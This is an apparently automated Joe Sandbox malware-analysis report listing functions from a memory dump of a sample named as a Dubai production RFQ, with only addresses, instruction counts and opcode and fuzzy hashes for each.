Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction ID: d08bdf0e7ce42db7072b411b7496821a904f908ba7f7671f1aeb410d49a25380
Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
Instruction Fuzzy Hash: 72517371E0062AEBDF25DF94C850BEEBBB9AF44714F048169EA01AB340DB74D945CFA4

Function 0160510D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a781bd71091d18d2fcdd400bbb6e419472d795c976d4b9b8878633524d216f7
Instruction ID: 993e45d4d8260e1b15b434622b6b80fe625c10a5b7c3c7fa748caf13e2448ce2
Opcode Fuzzy Hash: 5a781bd71091d18d2fcdd400bbb6e419472d795c976d4b9b8878633524d216f7
Instruction Fuzzy Hash: 1C518A71A012169FEB2BDFA8CC40BAFB7B5FF08355F144069F902A7291D774A8418F65

Function 016D3157 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction ID: 72b969dce2c5bcaf33f79507132eb9f52cfd81857f2185039d4fc1e253ad4ecc
Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
Instruction Fuzzy Hash: AC518DB1A00606EFDB16CF58C980A56FBB5FF45304F15C1AAE9089F352E371E946CBA0

Function 0163A350 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6579d9c875acc96636ef204092639957ca20c8958fbed1d56315dcbe74ca288f
Instruction ID: b77261dbbb2d07ce984e689531efa4bb259e6094d1500f2c5b6f5dc82e61109a
Opcode Fuzzy Hash: 6579d9c875acc96636ef204092639957ca20c8958fbed1d56315dcbe74ca288f
Instruction Fuzzy Hash: FC4144356512029BEB25EFACDC81F2A3766FB91708F01902DFA42DB346D7B1D8108BA4

Function 016CA553 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction ID: edd64c5fc066e430613cdfddf5ce94703ace9226ba509bd95a3be39fc4fbb971
Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction Fuzzy Hash: 8541C47260071A9BD725DF68CC80A7AB7A9FF94714B44862EE9128B344FB30ED15CBD4

Function 01630118 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3789778b91d6bac026c78c96848f7762a85c1de96e50db571498ae5fc51c6574
Instruction ID: 7ff12e335937e01792ca71f076a749e149dd02ffa5fd908d3ddda7fface4e894
Opcode Fuzzy Hash: 3789778b91d6bac026c78c96848f7762a85c1de96e50db571498ae5fc51c6574
Instruction Fuzzy Hash: 6C41CC359012199BDB10DF98CC40AEEB7B5BF88704F15816EF815E7350D3319D49CBA4

Function 0160D454 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d427b0e8ef5ff2a8b416eb3f49fb7a9a54e7400b586a99adb9c3b0d77f15c5
Instruction ID: e02fffccdc889b7c36b9bc569309b764b19b0373293c57c13abeba8267fa1a99
Opcode Fuzzy Hash: d6d427b0e8ef5ff2a8b416eb3f49fb7a9a54e7400b586a99adb9c3b0d77f15c5
Instruction Fuzzy Hash: D651BE32604691CFD726CB9CCC44B6AB7E9FB41B50F0906A9E9158B7E1D734EC41CB61

Function 01606074 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3055c322f9dde15bf068905af4742cb3e30b661189ed3d80be946e13ee22366
Instruction ID: 9606847941437f39741a3f51dc7a2cea6e5c62df033b9248dcc09f3f2bcd8716
Opcode Fuzzy Hash: b3055c322f9dde15bf068905af4742cb3e30b661189ed3d80be946e13ee22366
Instruction Fuzzy Hash: 8D51B070A401169BDB2ACB28CC10BAABBB5FF11318F1482EDE519973D2D7749991CF84

Function 015FB0D6 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c807c76c260f9a46ea3bd77e117472e2efaf6c224125492a8da40fcd374fdbab
Instruction ID: 76213a7b5e06deef3e88b9b2b38bd5557d983074f63358e5d431c08f8b30675f
Opcode Fuzzy Hash: c807c76c260f9a46ea3bd77e117472e2efaf6c224125492a8da40fcd374fdbab
Instruction Fuzzy Hash: F541A9B1640702EFDB22AF68CC50F6ABBE9FF55754F00886DEA019B250D770E940CB54

Function 016C81EE Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 15b699de84804b047abbbcb4145d13dd2a4a221e8859a10bf53dac7d13748f8f
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: BF419271B10215ABDB25DB99CC88ABFBBBFEB88A10F15806DE905A7341D774DE01C790

Function 016007A7 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe5aeb60f42aa4f856048ff2b4d007dd5687c41d1ce2f1d424d9aa4a329af48
Instruction ID: b008b90ab69b9a1c96bb35f91754600715dd68e90cecb238203cf1be46e101ef
Opcode Fuzzy Hash: 8fe5aeb60f42aa4f856048ff2b4d007dd5687c41d1ce2f1d424d9aa4a329af48
Instruction Fuzzy Hash: 0D41C2706007019FDB2ACF28CC80A23B7F9FF48354B154A6DE95787A91E730EA56CB90

Function 0162A390 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9ca89a40f372f91c4099c86e2e4159361b8a2202f44d82ffe9020d5009e698
Instruction ID: 526961d20819a2355fffc362a666d67366fd8e253c02ab91e7ac88479a2530f8
Opcode Fuzzy Hash: 9a9ca89a40f372f91c4099c86e2e4159361b8a2202f44d82ffe9020d5009e698
Instruction Fuzzy Hash: 4C41CB31A02625CFCB21CFACDE947AEBBB0BB58360F140159D401ABB94DBB0D951CFA4

Function 0163F523 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81c2cab1ab42f30548dea44835cb2205f2786464c5c046f77c9c88f13a86d6e
Instruction ID: 8b9c2f41e3f5c95cf6417a115b00d835e7ffac85ebc34a86f6570fa5a679023e
Opcode Fuzzy Hash: b81c2cab1ab42f30548dea44835cb2205f2786464c5c046f77c9c88f13a86d6e
Instruction Fuzzy Hash: 8B4128B4D00248AFDB25CFA9DC80AAEBBF4FB48310F50816EE559A7341DB309901CF61

Function 0160254C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7728c91f9b51ce05274e8363664e7a99ed1458b2c95791566be182fffadade1c
Instruction ID: 6263cf4b8bf32f516a366849012bfb8cbc3c7eef4a8c3a25542d32806b11c79f
Opcode Fuzzy Hash: 7728c91f9b51ce05274e8363664e7a99ed1458b2c95791566be182fffadade1c
Instruction Fuzzy Hash: F34199B05017018FCB2BDF28CD64A5AB7B6FF54314F1182AEC5178B2E5EB30A941CB45

Function 01680227 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861111f651fc69e2fa2ad5ff0dd1b455b5b7bf2d96c3cc3b8a5438bdbded8228
Instruction ID: bf475901ad63d7bb67b0cf7073c1a157548551791134e456ed0f37668884dcab
Opcode Fuzzy Hash: 861111f651fc69e2fa2ad5ff0dd1b455b5b7bf2d96c3cc3b8a5438bdbded8228
Instruction Fuzzy Hash: A64191726056429FD320EF68DC50A6AB7A9BF88700F044A2DF95987790E730D918C7AA

Function 01604779 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bd0abf6a2b6f8eff994880f9db18367aa136a7ee9e4e768ba4e9156e4f8f79
Instruction ID: cdf7e49ca7d0c306b83eb090576d1bf299d96c3df5a2e006fc0656c3b8e687f2
Opcode Fuzzy Hash: b0bd0abf6a2b6f8eff994880f9db18367aa136a7ee9e4e768ba4e9156e4f8f79
Instruction Fuzzy Hash: 13418D706042428BD73ADF28DC94B2BBBEAAF91355F15482DE642873E1DB30DA51CB91

Function 016101F1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
Instruction ID: 486ca28d668fe1937c8ab1a358e124817e1ec31174d9aab3766a7ce98ee326dc
Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
Instruction Fuzzy Hash: 1E312731A00245AFDF128BA8CC40BEABFE9AF14350F0885AAF855D7396C7748884CB64

Function 01629194 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5155d3dc42063741fea5c8b69a378c1da7110c2381cba4f63300095d8524f2fa
Instruction ID: be956dc0606c9e272886c9d765241e4079331e38e9605ea81ad55c30cfc0cc0b
Opcode Fuzzy Hash: 5155d3dc42063741fea5c8b69a378c1da7110c2381cba4f63300095d8524f2fa
Instruction Fuzzy Hash: D731A272A01A399FDB218B68CC40F9ABBB9EFC6714F1141D9E94CA7340DB309D458F55

Function 01604180 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 436a2ff27687e1e748bf5561fa3a53f3055816f132187f88a0d22a53071697e3
Instruction ID: fc648626f7ba00c693301a48ab60372a73d606b78fa9a6be66da6100c878b02f
Opcode Fuzzy Hash: 436a2ff27687e1e748bf5561fa3a53f3055816f132187f88a0d22a53071697e3
Instruction Fuzzy Hash: 0D419A31200B459FD736CF28CC90B967BE9AF58314F05882DEA5A8B390DB74E804CBA0

Function 01625004 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
Instruction ID: 0b3c2f80d73d4ee9bb4b5b93dc60c0b85b9435182cf5c25030b512d14b3c71b6
Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
Instruction Fuzzy Hash: 4231E831708661DFE731DA1C8C14BB6BBD5AB86390F048529F986CB381D779C842CBD2

Function 015FB420 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0c908dfebc481e5bbd38879f46eaead37dd1fb05343863c48cf45ebc5ac5fc
Instruction ID: 958b4cdf9f52c47ae870c8dfe6044997c7f9a38056d127f37e7a99c41bc950e7
Opcode Fuzzy Hash: 7b0c908dfebc481e5bbd38879f46eaead37dd1fb05343863c48cf45ebc5ac5fc
Instruction Fuzzy Hash: 12310372640208DFC721DF18C984A6ABBAAFF85364F15426DEE458F296D731ED42CBD0

Function 01608470 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae3a1d98a914dd013b8992ca3cfbdc3cd84279ae15502102afe900cd60016ba
Instruction ID: 6e16e4c930902d1a694153e9414dd92f4e97818e4801ef2f7f98a10e4ec15f93
Opcode Fuzzy Hash: 5ae3a1d98a914dd013b8992ca3cfbdc3cd84279ae15502102afe900cd60016ba
Instruction Fuzzy Hash: F4317C71A053528FE365CF19CC00B27BBE9FB88700F05496DE9889B391D774E844CB91

Function 0163A5E7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction ID: bed3e3085882075db84f41b62533cc40aa1d63222db4119a7bc099d9c2d2693c
Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction Fuzzy Hash: 88315C72B00B11AFE725CFADDD44B57BBE8BB89B50F14092DA59AC3750E730E800AB54

Function 016AE750 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd00f266064a006df62e15e1087f9991cf9a976b44cb6895f9577a10947ad15
Instruction ID: 937f90760431f4317f12f676e6f40836dbc7680b6f181e0e7b7729bccb3e812e
Opcode Fuzzy Hash: 5cd00f266064a006df62e15e1087f9991cf9a976b44cb6895f9577a10947ad15
Instruction Fuzzy Hash: A3319A719053028FCB21DF19C84096ABBF6FF89614F4985AEE4899B341D331ED45CF96

Function 016091E5 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
Instruction ID: 37d0ac6e8728738c794f94b61f3bb152693a8360a07397ec7a47dc551cdc8e2d
Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
Instruction Fuzzy Hash: C13176B16082468BCB06DF18D840A5BBBEAEB99754F0405AEFC5597391D730DC05CBA6

Function 016242AF Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c355cfd2157f1535b639d9765d29b20390a13429542121acefc04d173856f9a3
Instruction ID: fc39ce9252129aa4a14635e39391cd9b395bac563710a1841c33b31ac3fcc503
Opcode Fuzzy Hash: c355cfd2157f1535b639d9765d29b20390a13429542121acefc04d173856f9a3
Instruction Fuzzy Hash: 2B319F72B00A25DFD720EFA9CD80A6EBBFAEB54344F00442DD646D7254DB70E941CB91

Function 015FC0F6 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa66042c37f47607d5909a7a7868dcabe64eaafea0b6fccd70e24b59a974ab93
Instruction ID: b9bb66f5188b5ed40007c11b307877d9d7703d686a4da41f75ec9bb8fff56862
Opcode Fuzzy Hash: fa66042c37f47607d5909a7a7868dcabe64eaafea0b6fccd70e24b59a974ab93
Instruction Fuzzy Hash: 3B3133B19012118BDB21AF58CC40BB97BB5BF50318F4881ADD9869B3C6DB74E981CB94

Function 015FE3C0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7437dca6ad570824a27f9fd2e18a0cf713933ec25705cfb17cfbda76fa9a487d
Instruction ID: 8487e188e2604818543cbea27d60c80081c2a789620006f620505c17eaee1269
Opcode Fuzzy Hash: 7437dca6ad570824a27f9fd2e18a0cf713933ec25705cfb17cfbda76fa9a487d
Instruction Fuzzy Hash: 4B31A431A4051D9BDB31DA18CC46FEEB7B9FB55740F0200ADE745AB2A0D6749E818FA0

Function 016343D0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc320cf9433c0fae1d156a17b452940577883e4ebadd1a5c29c8b578b95c65a9
Instruction ID: cc539e2495b593f332a36e275fdfd3823b70328a7761f1e31ca9abcd90412b56
Opcode Fuzzy Hash: fc320cf9433c0fae1d156a17b452940577883e4ebadd1a5c29c8b578b95c65a9
Instruction Fuzzy Hash: 8E21BF725097419BCB21CE58CC90B6BB7E5FFC9720F04492DF9589B242DB31E901CBA2

Function 016344A8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction ID: 57451bc2f55f2cae25f3f21acd9125915b0fa8f080a9634f53f203b95f518fa9
Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction Fuzzy Hash: 87216275E00605ABCB11CF98C980A9AFFA5FF89320F10C079ED059B681DB71DE058B90

Function 015FE328 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
Instruction ID: bbb5a5b6ced6a458cc4cdeb60e2c95794ee2d6b4afe3e8a1c78b82d358f3a64f
Opcode Fuzzy Hash: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
Instruction Fuzzy Hash: BB318731600645EFE721CB68C885F6AB7F9FF45354F1548A9EA12DB2A0E730EE41CB50

Function 0167E289 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6f1691d4e7dddb65bba32baa59607d54b0b468ba1ba4801fe4f31614d0af4b
Instruction ID: 32925e4daca7c8704a40f20548a9f4700677c7886d014730cdb44c212c333062
Opcode Fuzzy Hash: 4b6f1691d4e7dddb65bba32baa59607d54b0b468ba1ba4801fe4f31614d0af4b
Instruction Fuzzy Hash: 06319F76610205DFCB14CF2CCC889AEB7F6FF84314B158499E80A9B351E732EA55CB94

Function 0163D450 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe0bf8a6298b9cef4a7432e90c5e7ae891cfd81b73dad6744c566340bed2787
Instruction ID: 93b7914235205344d2b55e9c2fed8d3d13ddc86a32267282ead6e2d73c7c1460
Opcode Fuzzy Hash: 5fe0bf8a6298b9cef4a7432e90c5e7ae891cfd81b73dad6744c566340bed2787
Instruction Fuzzy Hash: B121F1715403019BC720EFA8DC44F1B77AEBBA4A28F04082DBA0597384EB30DD05CBAA

Function 01603536 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e5c1aafa8a9c5ceb203641e8cd0c9ccc3db0f063df6723ff9804021e380f24
Instruction ID: 0987410b8884729b7acbf93e01049b1b8c13ae51b59e38e00e61683f47869784
Opcode Fuzzy Hash: 68e5c1aafa8a9c5ceb203641e8cd0c9ccc3db0f063df6723ff9804021e380f24
Instruction Fuzzy Hash: 4921DD31201A119FD727AF0ACE44B2BBBA1FF80B15F19042DE9420B795C771EC48CB91

Function 01680371 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25bb599cd6c53107ae508dd51ba61fe3013a43808cb02a2b68f96f8eb89848b
Instruction ID: 13da028c5e5d27eeb59fb1200febaf584a58e301bed1c3056692f1ffbde4205c
Opcode Fuzzy Hash: d25bb599cd6c53107ae508dd51ba61fe3013a43808cb02a2b68f96f8eb89848b
Instruction Fuzzy Hash: 72219E7290062ADBCB20DF59CC81ABEB7F4FF48700B550569F501EB240D778AD41CBA4

Function 0162F24A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
